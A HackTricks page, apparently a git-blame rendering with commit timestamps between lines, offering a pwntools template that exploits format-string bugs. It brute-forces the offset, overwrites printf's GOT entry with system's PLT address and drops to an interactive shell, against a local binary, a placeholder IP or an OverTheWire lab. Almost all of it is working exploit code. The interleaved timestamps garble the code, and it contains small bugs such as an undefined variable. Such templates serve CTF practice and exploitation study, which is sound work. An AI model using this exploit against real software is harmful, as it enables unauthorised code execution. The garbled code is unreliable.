2022-05-01 16:32:23 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-03-05 23:16:20 +00:00
< summary > < strong > HackTricks in < / strong > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch< / strong > < / a > < strong > Wed - 18.30(UTC) 🎙️< / strong > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 16:32:23 +00:00
2021-03-22 10:43:33 +00:00
```python
from pwn import *
2021-03-23 12:46:21 +00:00
from time import sleep
2021-03-22 10:43:33 +00:00
2022-05-01 12:41:36 +00:00
###################
### CONNECTION ####
###################
2021-03-22 10:43:33 +00:00
# Define how you want to exploit the binary
LOCAL = True
REMOTETTCP = False
REMOTESSH = False
GDB = False
2021-03-22 10:51:01 +00:00
# Configure vulnerable binary
2021-03-22 10:43:33 +00:00
LOCAL_BIN = "./tyler"
REMOTE_BIN = "./tyler" #For ssh
# In order to exploit the format string you may need to append/prepend some string to the payload
# configure them here
2021-10-08 00:22:38 +00:00
PREFIX_PAYLOAD = b""
2021-03-22 10:43:33 +00:00
SUFFIX_PAYLOAD = b""
2021-10-08 00:22:38 +00:00
NNUM_ALREADY_WRITTEN_BYTES = 0
2021-10-08 00:21:19 +00:00
MAX_LENTGH = 999999 #Big num if not restricted
print(" ====================== ")
print("Selected options:")
print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}")
print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}")
print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}")
print(" ====================== ")
2021-03-22 10:43:33 +00:00
def connect_binary():
global P, ELF_LOADED, ROP_LOADED
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
2022-05-01 12:41:36 +00:00
#######################################
### Get format string configuration ###
#######################################
2021-03-22 10:43:33 +00:00
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
2021-10-08 09:38:39 +00:00
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
2021-03-22 10:43:33 +00:00
P.sendline(payload)
2021-03-23 12:46:21 +00:00
sleep(0.5)
2021-03-22 10:43:33 +00:00
return P.recv()
def get_formatstring_config():
global P
for offset in range(1,1000):
connect_binary()
P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
2021-10-08 00:22:38 +00:00
connect_binary()
2021-03-22 10:43:33 +00:00
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
2021-10-08 09:38:39 +00:00
2021-03-22 10:43:33 +00:00
else:
2021-10-08 00:22:38 +00:00
connect_binary()
2021-03-22 10:43:33 +00:00
payload = b" " + payload
recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload
# is being reflected. Then, you will be able to put in the position arbitrary addresses
# and write arbitrary content in those addresses
# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
offset, padlen = get_formatstring_config()
# In this template, the GOT of printf (the part of the GOT table that points to where the printf
# function resides) is going to be modified by the address of the system inside the PLT (the
# part of the code that will jump to the system function).
# Therefore, next time the printf function is executed, system will be executed instead with the same
# parameters passed to printf
2021-10-08 00:21:19 +00:00
# In some scenarios you will need to loop1 more time to the vulnerability
# In that cases you need to overwrite a pointer in the .fini_array for example
# Uncomment the commented code below to gain 1 rexecution extra
#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address
#INIT_LOOP_ADDR = 0x8048614 # Address to go back
2021-03-22 10:43:33 +00:00
SYSTEM_PLT = ELF_LOADED.plt["system"]
P_GOT = ELF_LOADED.got["printf"]
2021-10-08 00:21:19 +00:00
#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}")
#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}")
2021-03-22 10:43:33 +00:00
log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
log.info(f"Printf GOT address: {hex(P_GOT)}")
2021-10-08 00:22:38 +00:00
connect_binary()
2021-10-07 21:29:11 +00:00
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
2021-10-08 00:21:19 +00:00
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
sleep(5)
2021-10-07 21:29:11 +00:00
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
2021-10-08 00:21:19 +00:00
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
2021-03-22 10:43:33 +00:00
format_string.write(P_GOT, SYSTEM_PLT)
format_string.execute_writes()
# Now that printf function is executing system you just need to find a place where you can
# control the parameters passed to printf to execute arbitrary code.
P.interactive()
```
2022-05-01 16:32:23 +00:00
2022-04-28 16:01:33 +00:00
< details >
2023-03-05 23:16:20 +00:00
< summary > < strong > HackTricks in < / strong > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch< / strong > < / a > < strong > Wed - 18.30(UTC) 🎙️< / strong > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2022-05-01 16:32:23 +00:00